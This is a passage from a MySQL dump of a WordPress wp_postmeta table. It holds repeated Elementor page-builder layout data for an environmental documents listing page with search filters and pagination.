settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38593,80,'_elementor_css','a:6:{s:4:\"time\";i:1770855097;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(29969,4188,'_elementor_pro_version','3.3.6'),(29970,4189,'_elementor_edit_mode','builder'),(29971,4189,'_elementor_template_type','wp-page'),(29972,4189,'_elementor_version','3.4.0'),(29973,4189,'_wp_page_template','default'),(29974,4189,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"},{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filter\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29976,4189,'_elementor_pro_version','3.3.6'),(29978,4190,'_elementor_edit_mode','builder'),(29979,4190,'_elementor_template_type','wp-page'),(29980,4190,'_elementor_version','3.4.1'),(29981,4190,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (29982,4190,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"},{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filter\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29984,4190,'_elementor_pro_version','3.3.6'),(29985,4191,'_elementor_edit_mode','builder'),(29986,4191,'_elementor_template_type','wp-page'),(29987,4191,'_elementor_version','3.4.1'),(29988,4191,'_wp_page_template','default'),(29989,4191,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"},{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filter\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29991,4191,'_elementor_pro_version','3.3.6'),(29992,4192,'_elementor_edit_mode','builder'),(29993,4192,'_elementor_template_type','wp-page'),(29994,4192,'_elementor_version','3.4.1'),(29995,4192,'_wp_page_template','default'),(29996,4192,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"},{\"id\":\"add4b3d\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"query_id\":\"jet-smart-filter\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_bg_color_active\":\"#0A3C11\",\"pagination_items_color_active\":\"#FFFFFF\",\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"pagination_items_alignment\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38592,2503,'_elementor_css','a:6:{s:4:\"time\";i:1770854975;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(29998,4192,'_elementor_pro_version','3.3.6'),(30003,4193,'_elementor_edit_mode','builder'),(30004,4193,'_elementor_template_type','loop'),(30005,4193,'_elementor_version','3.4.1'),(30006,4193,'_elementor_pro_version','3.3.6'),(30007,4193,'_wp_page_template','default'),(30008,4193,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(30009,4193,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"ec82dac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"f3da858\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"left\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"766d5fb\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"c35d24b\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"796caf9\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Uploaded:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"b3c26a1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" 